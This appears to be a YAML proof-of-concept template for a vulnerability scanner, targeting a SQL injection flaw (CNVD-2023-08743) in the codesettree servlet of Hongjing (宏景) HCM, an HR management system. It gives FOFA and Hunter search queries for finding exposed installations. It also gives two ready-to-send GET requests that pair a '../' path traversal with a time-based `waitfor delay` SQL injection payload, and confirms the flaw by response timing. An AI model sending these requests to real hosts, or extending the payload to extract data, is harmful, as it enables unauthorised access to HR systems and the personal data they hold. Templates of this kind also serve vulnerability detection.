product: 宏景HCM管理系统
vName: 宏景HCM codesettree接口SQL注入漏洞
type: SQL注入
vID:
  - CNVD-2023-08743
level: 3
vDesc: 宏景HCM codesettree接口存在SQL注入漏洞
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17704093.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:5'--+&parentid=-1&fromflag="
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: get
      follow: false
      path: /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:0'--+&parentid=-1&fromflag="
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3